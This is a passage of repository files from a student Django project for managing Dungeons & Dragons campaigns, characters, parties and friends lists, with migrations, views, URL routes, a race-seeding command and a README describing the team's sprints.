'0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Campaign',\n fields=[\n ('campaignID', models.AutoField(primary_key=True, serialize=False)),\n ('campaignName', models.CharField(max_length=255)),\n ('image', models.ImageField(default='default_campaign.jpg', upload_to='campaign_pics')),\n ('creator', models.ForeignKey(default=Campaign_Manager.models.defaultUser, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='CampaignComment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=100)),\n ('content', models.TextField()),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('image', models.ImageField(null=True, upload_to='comment_pics')),\n ('slug', models.SlugField(default='default-slug')),\n ('author', models.ForeignKey(default=Campaign_Manager.models.defaultUser, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Campaign_Manager.Campaign')),\n ],\n ),\n migrations.CreateModel(\n name='CampaignDM',\n fields=[\n ('campaignDMID', models.AutoField(primary_key=True, serialize=False)),\n ('campaign', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='Campaign_Manager.Campaign')),\n ('user', models.ForeignKey(default=Campaign_Manager.models.defaultUser, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Party',\n fields=[\n ('partyID', models.AutoField(primary_key=True, serialize=False)),\n ('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='campaign', to='Campaign_Manager.Campaign')),\n ('members', models.ManyToManyField(to='Character_Builder.Character')),\n ],\n ),\n migrations.CreateModel(\n name='PartyCharacter',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('approved', models.BooleanField(default=False)),\n ('character', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Character_Builder.Character')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6423316597938538, "alphanum_fraction": 0.6423316597938538, "avg_line_length": 31.127273559570312, "blob_id": "7de030f3deacadabd4523959c314d99c8fb6a01a", "content_id": "b41403ae24eec28ce1b9648eee10ece4f6922abf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3534, "license_type": "no_license", "max_line_length": 94, "num_lines": 110, "path": "/Users/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.forms import User\nfrom django.contrib import messages\nfrom .forms import UserRegistrationForm, UserUpdateForm, ProfileUpdateForm\nfrom Campaign_Manager .models import Campaign, Party, PartyCharacter\nfrom Character_Builder.models import Character\nfrom .models import Friend\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your account has been created! 
Please log in')\n return redirect('login')\n else:\n form = UserRegistrationForm()\n return render(request, 'Users/register.html', {'form': form})\n\ndef profile(request, pk=None ):\n\n if pk:\n user = User.objects.get(pk=pk)\n else:\n user = request.user\n\n myCharacters = Character.objects.filter(user=user)\n allCampaigns = Campaign.objects.all()\n myCampaigns = Campaign.objects.filter(creator=user)\n\n characterCampaigns = None\n for mc in myCharacters:\n if characterCampaigns==None:\n characterCampaigns = PartyCharacter.objects.filter(character=mc)\n else:\n characterCampaigns |= PartyCharacter.objects.filter(character=mc)\n\n if characterCampaigns != None:\n for cc in characterCampaigns:\n primaryKey=cc.party.campaign.pk\n myCampaigns |= Campaign.objects.filter(pk=primaryKey)\n\n for camp in allCampaigns:\n parties = Party.objects.filter(campaign=camp)\n\n for party in parties:\n for mem in party.members.all():\n for char in myCharacters:\n if mem == char:\n campSet = Campaign.objects.filter(pk=camp.pk)\n myCampaigns |= campSet\n\n\n context ={\n\n 'user' : user,\n 'users' : User.objects.exclude(id=request.user.id),\n 'campaigns' : myCampaigns,\n 'characters' : myCharacters,\n 'title' : 'Profile',\n\n }\n\n return render(request, 'Users/profile.html', context)\n\ndef friends(request):\n\n user = User.objects.exclude(id=request.user.id)\n friend, created = Friend.objects.get_or_create(current_user=request.user)\n friends = friend.users.all()\n\n context = {\n 'title' : 'Friends List',\n 'users' : user,\n 'friends': friends,\n }\n\n return render(request, 'Users/friends.html', context)\n\ndef edit_profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n\n messages.success(request, f'Your account has been updated!')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n\n return render(request, 'Users/edit_profile.html', context)\n\ndef update_friends(request, operation, pk):\n friend = User.objects.get(pk=pk)\n if operation == 'add':\n Friend.make_friend(request.user, friend)\n elif operation == 'remove':\n Friend.unfriend(request.user, friend)\n return redirect('friends')\n" }, { "alpha_fraction": 0.7478005886077881, "alphanum_fraction": 0.7478005886077881, "avg_line_length": 21.600000381469727, "blob_id": "d35cc7aea1a28cf2b93fd1fd2ced88ee625e89a7", "content_id": "01a1cd87aabe98151ef20b0a4b9cfe551ec04598", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "no_license", "max_line_length": 45, "num_lines": 15, "path": "/Campaign_Manager/forms.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Campaign, CampaignComment\n\nclass CreateCampaignForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Campaign\n\t\tfields = ['campaignName']\n\nclass CreatePostForm(forms.ModelForm):\n\n\timage = forms.ImageField(required=False)\n\n\tclass Meta:\n\t\tmodel = CampaignComment\n\t\tfields = ['title', 'content', 'image']\n\n\n" }, { "alpha_fraction": 0.57833331823349, "alphanum_fraction": 0.6016666889190674, "avg_line_length": 19.176469802856445, "blob_id": 
"72d1588ab89fd7eb0de3c15b9c5a3b2414ea36df", "content_id": "85ade15bea315576e4cb1840200b68e6d819dbb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2400, "license_type": "no_license", "max_line_length": 68, "num_lines": 119, "path": "/Character_Builder/management/commands/populate_race_db.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\nfrom Character_Builder.models import (\n CharacterRace\n)\n\n# Run this with \"python manage.py populate_race_db\"\n# This is an\n\nclass Command(BaseCommand):\n args = '<foo bar ...>'\n help = 'our help string comes here'\n\n def _create_races(self):\n \n # # Because the models has a built-in defaultRace\n # # that is called before running this script as it is migrating\n # # this race is commented out.\n # human = CharacterRace(\n # raceName='Human',\n # speed=30,\n # size='Medium',\n\n # strengthBonus=1,\n # dexterityBonus=1,\n # constitutionBonus=1,\n # intelligenceBonus=1,\n # wisdomBonus=1,\n # charismaBonus=1\n # )\n # human.save()\n\n dwarf = CharacterRace(\n raceName='Dwarf',\n speed=25,\n size='Small',\n\n strengthBonus=0,\n dexterityBonus=0,\n constitutionBonus=2,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n dwarf.save()\n\n\n elf = CharacterRace(\n raceName='Elf',\n speed=30,\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=2,\n constitutionBonus=0,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n elf.save()\n\n gnome = CharacterRace(\n raceName='Gnome',\n speed=30,\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=0,\n constitutionBonus=0,\n intelligenceBonus=2,\n wisdomBonus=0,\n charismaBonus=0\n )\n gnome.save()\n\n halfling = CharacterRace(\n raceName='Halfling',\n speed=30, #Not sure if this is fully accurate\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=2,\n constitutionBonus=0,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n halfling.save()\n\n halfOrc = CharacterRace(\n raceName='Half-Orc',\n speed=30,\n size='Medium',\n\n strengthBonus=2,\n dexterityBonus=0,\n constitutionBonus=1,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n halfOrc.save()\n\n tiefling = CharacterRace(\n raceName='Tiefling',\n speed=30,\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=0,\n constitutionBonus=0,\n intelligenceBonus=1,\n wisdomBonus=0,\n charismaBonus=2\n )\n tiefling.save()\n\n\n def handle(self, *args, **options):\n self._create_races()" }, { "alpha_fraction": 0.67580646276474, "alphanum_fraction": 0.67580646276474, "avg_line_length": 33.5, "blob_id": "6b9aa12100ad8946937cacc5bd7966a672de5523", "content_id": "edc71f35fff680c1a71a0e0499d6d7c9f0b9920c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 620, "license_type": "no_license", "max_line_length": 84, "num_lines": 18, "path": "/Inventory/urls.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (\n ItemListView,\n ItemDetailView,\n ItemCreateView,\n ItemEditView,\n ItemDeleteView\n)\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name='inventory-home'),\n path('inventory/', ItemListView.as_view(), name='item-list'),\n path('inventory/create/', ItemCreateView.as_view(), name='item-create'),\n path('inventory/<int:pk>/', ItemDetailView.as_view(), name='item-detail'),\n path('inventory/<int:pk>/edit', ItemEditView.as_view(), name='item-edit'),\n path('inventory/<int:pk>/delete', ItemDeleteView.as_view(), name='item-delete'),\n]" }, { "alpha_fraction": 0.5502467155456543, "alphanum_fraction": 0.5692027807235718, "avg_line_length": 43.77906799316406, "blob_id": "200bb1544cb3702f5fb172331da0e7a5d0555ac4", "content_id": "21b7a841b203eda0fe2480a7d031eb9858c3011b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3851, "license_type": "no_license", "max_line_length": 187, "num_lines": 86, "path": "/Character_Builder/migrations/0001_initial.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:08\n\nimport Character_Builder.models\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AbilityScore',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('abilityName', models.CharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='AbilityScoreSet',\n fields=[\n ('abilityScoreSetID', models.AutoField(primary_key=True, serialize=False)),\n ('strength', models.IntegerField(default=10)),\n ('dexterity', models.IntegerField(default=10)),\n ('constitution', models.IntegerField(default=10)),\n ('intelligence', models.IntegerField(default=10)),\n ('wisdom', models.IntegerField(default=10)),\n ('charisma', models.IntegerField(default=10)),\n ],\n ),\n migrations.CreateModel(\n name='Character',\n fields=[\n ('characterID', models.AutoField(primary_key=True, serialize=False)),\n ('characterName', models.CharField(max_length=255)),\n ('level', models.IntegerField(default=0)),\n ('xp', models.IntegerField(default=0)),\n ('maxHP', models.IntegerField(default=6)),\n ('currentHP', models.IntegerField(default=6)),\n ('alignment', models.CharField(max_length=255)),\n ('size', models.CharField(max_length=255)),\n ('public', models.BooleanField(default=True)),\n ('strength', models.IntegerField(default=10)),\n ('dexterity', models.IntegerField(default=10)),\n ('constitution', models.IntegerField(default=10)),\n ('intelligence', models.IntegerField(default=10)),\n ('wisdom', models.IntegerField(default=10)),\n ('charisma', models.IntegerField(default=10)),\n ('user', models.ForeignKey(blank=True, default=Character_Builder.models.defaultUser, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='CharacterClass',\n fields=[\n ('characterID', models.AutoField(primary_key=True, serialize=False)),\n ('className', models.CharField(max_length=255)),\n ('hitDice', models.CharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='CharacterRace',\n fields=[\n ('raceID', models.AutoField(primary_key=True, serialize=False)),\n ('raceName', models.CharField(max_length=255)),\n ('speed', models.IntegerField()),\n ('size', models.CharField(max_length=255)),\n 
('strengthBonus', models.IntegerField(default=0)),\n ('dexterityBonus', models.IntegerField(default=0)),\n ('constitutionBonus', models.IntegerField(default=0)),\n ('intelligenceBonus', models.IntegerField(default=0)),\n ('wisdomBonus', models.IntegerField(default=0)),\n ('charismaBonus', models.IntegerField(default=0)),\n ],\n ),\n migrations.AddField(\n model_name='abilityscoreset',\n name='character',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Character_Builder.Character'),\n ),\n ]\n" }, { "alpha_fraction": 0.7591136693954468, "alphanum_fraction": 0.8018227219581604, "avg_line_length": 82.49253845214844, "blob_id": "27914f863f3636e47a19bb0d4092d0b4e17be907", "content_id": "7300e6f2c85be90cadae3b0c230a61327bd4e048", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5602, "license_type": "no_license", "max_line_length": 589, "num_lines": 67, "path": "/README.md", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# DnD-Manager\n\n## Team Members\n* Nicholas Jackson\n* Josh Delgado\n* Jared Spinks\n* Ben Rhiner\n\n## Vision Statement\n*For tabletop game players and game-masters that want to minimize the trivial aspects of playing and automate sharing information between the party. This game manager is a web-based tabletop game manager app that automates sharing information among the party and fosters communication and organization. Unlike D&D beyond that assists in character creation with a lack of focus on player/game-master interaction and 5etools that is a searchable database of just the rules, this game manager is focused on ensuring the party’s custom information is shared among the players and gamemasters.*\n\n*This game manager’s ultimate goal is to reduce trivial recordkeeping by automating communication and organization of the party’s information as a whole. 
This is achieved through live updates and sharing of information among the party through cloud-based services, in addition to the DM maintaining notes that can be made public or private in an organization customized for their campaign.*\n\n\n# Sprint 1\n* [Product Backlog](https://docs.google.com/spreadsheets/d/1pM4LNKbn0VARa-6aoJjO_WKt7aaFGWfbQ1u1XvpPESQ/edit?usp=sharing)\n* [Sprint Backlog](https://docs.google.com/spreadsheets/d/1kSwNj9AX5eNbuktb5aTGljWqAJVrcWliXfjf6ji_MKM/edit?usp=sharing)\n * [Burndown Chart](https://docs.google.com/document/d/1-_eGpnEMTqlTQZ9PR7Idvgc8gjCuF-HovycDQMN_Dac/edit?usp=sharing)\n* [Requirements](https://docs.google.com/spreadsheets/d/1gTuvJt6pRhQ97uNCz52Mkvo1T-Q63PJ0XSgve65ibP8/edit?usp=sharing)\n* Design Documents\n * [Data Design](https://docs.google.com/document/d/1QYjD3UI0MlG_QJy867MBFY1zpKTJi5I4bI_s6t0syXE/edit)\n * [System Architecture](https://docs.google.com/drawings/d/1TUbR1T9_B6WfCYGCicQKSH8qjjn9X43obXvX7nI2Zt0/edit?usp=sharing)\n * [Class Diagrams](https://drive.google.com/file/d/1Kn8L8AD4Q7S4hYZRatU0C2qe99p2qACq/view?usp=sharing)\n* Source Code\n* [Test Cases](https://docs.google.com/document/d/1jeAmTsOX1DLROMjujJQcMQVDFOtzR25D7ZI6UhZR3LY/edit?usp=sharing)\n* [Product Demonstration](https://youtu.be/6ltb8DO0trQ)\n\n# Sprint 2\n* [Product Backlog](https://docs.google.com/spreadsheets/d/1SPUiozr4JJKxr4k5lzCdrsaK0-ws7KYtYSmHfMbI7UQ/edit?usp=sharing)\n* [Sprint Backlog](https://docs.google.com/spreadsheets/d/1dhpriiFvRYicpAsZGmL1GV5vPbZGGatdtJmQnLFWid0/edit?usp=sharing)\n * [Burndown Chart](https://docs.google.com/document/d/18wBcHFsRhLXcDcpsvCfUhsCGa7oUfoBtNgBy4vTgdsY/edit?usp=sharing)\n* [Requirements](https://docs.google.com/spreadsheets/d/1nBXPtSvDhTsFcAjuocsOde_xebhhVQDXfutLvxPRiQA/edit?usp=sharing)\n* Design Documents\n * [Data Design](https://docs.google.com/document/d/1E3cikrkHcXE-PxppXv7h1ovNXgMTyPIy-kNyr7d9zvQ/edit?usp=sharing)\n * [System Architecture Overview](https://github.com/NickJacksonDev/DnD-Manager/blob/master/Architecture.md)\n * [Architecture Diagram](https://docs.google.com/drawings/d/1MgBqA1_aYosADHNCrgWPZ0p7me8jpzWHd6jJAV7-gSk/edit?usp=sharing)\n * [Architecture Description](https://docs.google.com/document/d/1FA4I41uiwIgKB1tqMOyXJnYcXf9lOJA9ilg85u-RlCQ/edit?usp=sharing)\n * Classes\n * [Class Diagrams](https://drive.google.com/file/d/1NqDpVnVrYHD-SCcfD8B3sug9F6vCOEDB/view?usp=sharing)\n * [Class Descriptions](https://docs.google.com/document/d/1n7qOdXY2i-A0tg3gyodm_GhEKr2NwJpASYI_jcA4ivU/edit?usp=sharing)\n * User Interface\n * [User Interface Diagram](https://drive.google.com/file/d/1WVBX7nz-pJ9zIM4E0k-gchcGm-XRzGoa/view?usp=sharing)\n * [User Story Relations](https://docs.google.com/document/d/1NZeqT6CyVsro24gmO0C-WLZbVaCbVZdCNq2G_n58w24/edit?usp=sharing)\n* Source Code\n* [Test Cases](https://docs.google.com/document/d/1hySpFXEcgq7yQpKu9dCfXvBHdXgoCP7uj1-dY4Cz4eY/edit?usp=sharing)\n* [Product Demonstration](https://youtu.be/k7sRfb0jwsg)\n\n# Sprint 3\n* [Product Backlog](https://docs.google.com/spreadsheets/d/1yalU93YStqyqwz3ZUBy1EZtLaKhgMID6f6fufWoZ8KE/edit?usp=sharing)\n* [Sprint Backlog](https://docs.google.com/spreadsheets/d/1fUKUxqtg4JkbHNHFF-oZBy5y-RowhtRdM0Aj0t6JSWU/edit?usp=sharing)\n * [Burndown Chart](https://docs.google.com/document/d/14EaDMDu6UjNrwlDF0L1FxrIARe3oWlqZVHWuSyc8J7Y/edit?usp=sharing)\n* [Requirements](https://docs.google.com/spreadsheets/d/1N1CPy_iaRu0dj6hx-nkWUPKK_pFIlQ1c-Mawc0ftHAs/edit?usp=sharing)\n* [Design Documents (Combined 
Document)](https://docs.google.com/document/d/1s8nar8XPxwj1na15H7PedzE4kgNBds71AkfJFWZuHKA/edit?usp=sharing)\n * Individual Links (If Opening Separate Windows is Preferred)\n * [Data Design](https://docs.google.com/document/d/1luUCUrMzw5AgNp7mY7Sc9mi2SCJleE6BTxNjuhC9a_s/edit?usp=sharing)\n * System Architecture Overview\n * [Architecture Diagram](https://docs.google.com/drawings/d/1QB8_oTkLlWlGW-ZIlmnDqP8lbqBihxm7guUMsRQxpFs/edit?usp=sharing)\n * [Architecture Description](https://docs.google.com/document/d/1PfuGnhexS1KiL8sTXMu0RO_MVArG7sSLIJT3LDr3kNE/edit?usp=sharing)\n * Classes\n * [Class Diagrams](https://drive.google.com/file/d/1-mnnTIaG9umsVRBlkadUle6McMipODDV/view?usp=sharing)\n * [Class Descriptions](https://docs.google.com/document/d/1Sz1qP_hNL0tkByMlr58MUXH_xwITuTcloRjZduedv9E/edit?usp=sharing)\n * User Interface\n * [User Interface Diagram](https://drive.google.com/file/d/14GJEFWQ_2_uggGBrMssqrSDOC16sWf8y/view?usp=sharing)\n * [User Story Relations](https://docs.google.com/document/d/1gBH1nNC6jHg3AjiZ9-_l93y2HP8Zjsq4H2v9jQA58WE/edit?usp=sharing)\n* Source Code\n* [Test Cases](https://docs.google.com/document/d/1hpWtMmyitNWu-DH_e-ypOIHVHwBIGMqULYviUlygRm8/edit?usp=sharing)\n* [Product Demonstration](https://youtu.be/CoPPveRnor8)\n\n\n" }, { "alpha_fraction": 0.5574572086334229, "alphanum_fraction": 0.6039119958877563, "avg_line_length": 21.72222137451172, "blob_id": "779ed55d1125bfd96ce981d22c3e62f91088af26", "content_id": "7b41b41d4a55be3b87d2ff266e05c164ec7e16b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 75, "num_lines": 18, "path": "/Campaign_Manager/migrations/0002_auto_20190408_1028.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-04-08 14:28\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Campaign_Manager', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='party',\n name='members',\n field=models.ManyToManyField(to='Character_Builder.Character'),\n ),\n ]\n" }, { "alpha_fraction": 0.6841349601745605, "alphanum_fraction": 0.6841349601745605, "avg_line_length": 29.955554962158203, "blob_id": "2e897c9dcf222c695b3957a269da81def2379ca1", "content_id": "1b7f67b37943531cf2b29e42d000146d1f639bc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 110, "num_lines": 45, "path": "/Campaign_Manager/urls.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.urls import path, reverse, re_path\nfrom django.utils.text import slugify\nfrom .views import (\n CampaignListView,\n CampaignDetailView,\n CampaignCommentCreateView,\n CampaignCommentDetailView,\n CampaignCommentEditView,\n CampaignCommentDeleteView,\n)\nfrom django.urls import path\nfrom . 
import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n path('',\n \tviews.home, name='campaign_builder-home'),\n\n path('campaigns/',\n \tCampaignListView.as_view(), name='campaign-list'),\n\n path('campaigns/<int:pk>/',\n views.overview, name = 'overview_with_pk'),\n\n path('campaigns/<int:pk>/AddComment/',\n \tCampaignCommentCreateView.as_view(), name='campaign-comment'),\n\n path('campaigns/<int:fk>/<slug:slug>/',\n \tCampaignCommentDetailView.as_view(), name='campaigncomment-detail'),\n\n path('campaigns/<int:fk>/<slug:slug>/edit',\n \tCampaignCommentEditView.as_view(), name='campaigncomment-edit'),\n\n path('campaigns/<int:fk>/<slug:slug>/delete',\n \tCampaignCommentDeleteView.as_view(), name='campaigncomment-delete'),\n\n re_path(r'^connect/(?P<operation>.+)/(?P<pk>\\d+)/(?P<id>\\d+)/$', views.update_party, name='update_party'),\n\n path('campaigns/<int:pk>/delete',\n views.confirmDeletion, name = 'confirm-delete'),\n\n path('campaigns/<int:pk>/delete/confirmed',\n views.deleteCampaign, name = 'campaign-delete'),\n]\n" }, { "alpha_fraction": 0.7054759860038757, "alphanum_fraction": 0.7069924473762512, "avg_line_length": 25.026315689086914, "blob_id": "dcb9945b4bd1ef8bf64008479540bed1f2a18021", "content_id": "c862cdb02b5b7026ad33af6a49c803ead09e13dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5935, "license_type": "no_license", "max_line_length": 88, "num_lines": 228, "path": "/Character_Builder/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.views.generic import (\n\tListView, \n\tDetailView,\n\tCreateView,\n\tUpdateView,\n\tDeleteView\n)\n\nfrom django.http import HttpResponseRedirect\nfrom .models import (\n\tCharacter, \n\tAbilityScoreSet,\n\tCharacterRace,\n\tCharacterClass\n)\nfrom .forms import (\n\tCreateCharacterForm, \n\t#EditCharacterForm, \n\tEditAbilityScoresForm \n)\n\ndef home(request):\n\tform = CreateCharacterForm(request.POST or None)\n\n\tif form.is_valid():\n\t\tform.save()\n\n\tcontext = {\n\t\t\t'title': 'Home',\n\t\t\t'form': form,\n\t\t\t'characters' : Character.objects.all(),\n\n\t}\n\n\treturn render(request, 'Character_Builder/character_builder-home.html', context)\n\t\n# This is a class based view that uses django's built-in\n# ListView view to display the characters\n# It inherits from ListView\nclass CharacterListView(ListView): \n\tmodel = Character\n\t# template_name = 'CharacterBuilder/Character_builder-home.html'\n\tcontext_object_name = 'characters'\n\n\nclass CharacterDetailView(DetailView):\n\tmodel = Character\n\t# context_object_name = 'characters'\n\n\tdef get_context_data(self, **kwargs):\n\t\t# Call the base implementation first to get a context\n\t\tcontext = super().get_context_data(**kwargs)\n\t\t# Add in the AbilityScore so it can print that as well\n\t\t# context['abilityScores'] = AbilityScoreSet.objects.get_object(character = character)\n\t\t\n\t\treturn context\n\n\nclass CharacterCreateView(LoginRequiredMixin, CreateView):\n\tmodel = Character\n\n\t# Make sure this is updated once you change the form!\n\tfields = [\n\t\t'public',\n\t\t'characterName', \n\t\t'race',\n\t\t'characterClass',\n\t\t'level', \n\t\t'xp', \n\t\t'maxHP', \n\t\t'currentHP', \n\t\t'alignment', 
\n\t\t'size',\n\n\t\t'strength',\n\t\t'dexterity',\n\t\t'constitution',\n\t\t'intelligence',\n\t\t'wisdom',\n\t\t'charisma'\n\t]\n\t# exclude = []\n\n\t# Added for LoginRequiredMixin\n\tlogin_url = '/login/'\n\n\t# def __init__(self, *args, **kwargs):\n\t# \tform.instance.user = self.request.user\n\n\t# This gets the context which it passes to the html.\n\t# The form1 that the html accesses is defined here.\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(CharacterCreateView, self).get_context_data(**kwargs)\n\t\t\n\t\t# Actually, django has a built in form using the fields above...\n\t\t# So I'm just going to use that built in form.\n\t\tform = CreateCharacterForm(self.request.POST or None)\n\t\tcontext['unusedform'] = form\n\n\t\t# form2 = EditAbilityScoresForm(self.request.POST or None)\n\t\t# context['form2'] = form2\n\t\treturn context\n\n\n\t# def get_context_data(self, **kwargs):\n # context = super(CampaignCommentCreateView, self).get_context_data(**kwargs)\n # campaign=Campaign.objects.get(pk=self.kwargs.get('pk'))\n # dms = CampaignDM.objects.filter(campaign=campaign)\n # context['userIsDM'] = False\n # for dm in dms:\n # if dm.user == self.request.user:\n # context['userIsDM'] = True\n\n # return context\n\n\n\tdef form_valid(self, form):\n\t\t# Updates the author of the current form to be the current user\n\t\tform.instance.user = self.request.user \n\t\t# context['form2'].instance.character = form.instance\n\t\t\n\t\treturn super().form_valid(form)\n\t\n\n\t# TODO: Lookup how to manage this. Perhaps render a different context\n\t# Or a \"Sorry, not able to login\" screen\n\tdef form_invalid(self, **kwargs):\n\t\treturn self.render_to_response(self.get_context_data(**kwargs))\n\n\n\nclass CharacterEditView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n\tmodel = Character\n\tfields = [\n\t\t'public',\n\t\t'characterName', \n\t\t'race',\n\t\t'characterClass',\n\t\t'level', \n\t\t'xp', \n\t\t'maxHP', \n\t\t'currentHP', \n\t\t'alignment', \n\t\t'size',\n\n\t\t'strength',\n\t\t'dexterity',\n\t\t'constitution',\n\t\t'intelligence',\n\t\t'wisdom',\n\t\t'charisma'\n\t]\n\t# exclude = []\n\n\tlogin_url = '/login/'\n\t\n\tdef form_valid(self, form):\n\t\tform.instance.author = self.request.user\n\t\treturn super().form_valid(form)\n\t\n\t# Tests to ensure the logged-in user is the owner of that character...\n\tdef test_func(self):\n\t\tCharacter = self.get_object()\n\t\tif self.request.user == Character.user:\n\t\t\treturn True\n\t\treturn False\n\t\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(CharacterEditView, self).get_context_data(**kwargs)\n\n\t\t# This grabs the self's request's information that is passed into\n\t\t# the edit view data.\n\t\t# For some reason, it does not properly fill in the information\n\t\t# So I'm currently not using this, instead the character_form.html\n\t\t# uses the 'form' that is built into it.\n\t\tform = CreateCharacterForm(self.request.POST or None)\n\t\tcontext['unusedForm1'] = form\n\n\t\t# form2 = EditAbilityScoresForm(self.request.POST or None)\n\t\t# context['form2'] = form2\n\t\treturn context\n\n\t# TODO: Lookup how to manage this. 
Perhaps render a different context\n\t# Or a \"Sorry, not able to login\" screen\n\tdef form_invalid(self, **kwargs):\n\t\treturn self.render_to_response(self.get_context_data(**kwargs))\n\n\nclass CharacterDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n\tmodel = Character\n\tsuccess_url = '/'\n\tlogin_url = '/login/'\n\tfail_url = '/login/' #Works?\n\n\tdef test_func(self):\n\t\tCharacter = self.get_object()\n\t\tif self.request.user == Character.user:\n\t\t\treturn True\n\t\treturn False\n\ndef home_page(request):\n\n context = {\n 'title' : 'Welcome to DnD Manager!',\n }\n\n return render(request, 'Character_Builder/home.html', context)\n\n\n# This is a class based view that uses django's built-in\n# ListView view to display the races\n# It inherits from ListView\nclass CharacterRaceListView(ListView): \n\tmodel = CharacterRace\n\t# template_name = 'CharacterBuilder/Character_builder-home.html'\n\tcontext_object_name = 'races'\n\n# This is a class based view that uses django's built-in\n# ListView view to display the classes\n# It inherits from ListView\nclass CharacterClassListView(ListView): \n\tmodel = CharacterClass\n\t# template_name = 'CharacterBuilder/Character_builder-home.html'\n\tcontext_object_name = 'classes'\n\n" }, { "alpha_fraction": 0.6738064289093018, "alphanum_fraction": 0.6815484166145325, "avg_line_length": 31.8389835357666, "blob_id": "8ad6cce68722e464b80a9e2fb7a6701906758101", "content_id": "1c410fda5f7fb0c9f5a2e6ae3fd8b39013b9c4a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3875, "license_type": "no_license", "max_line_length": 93, "num_lines": 118, "path": "/Campaign_Manager/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import 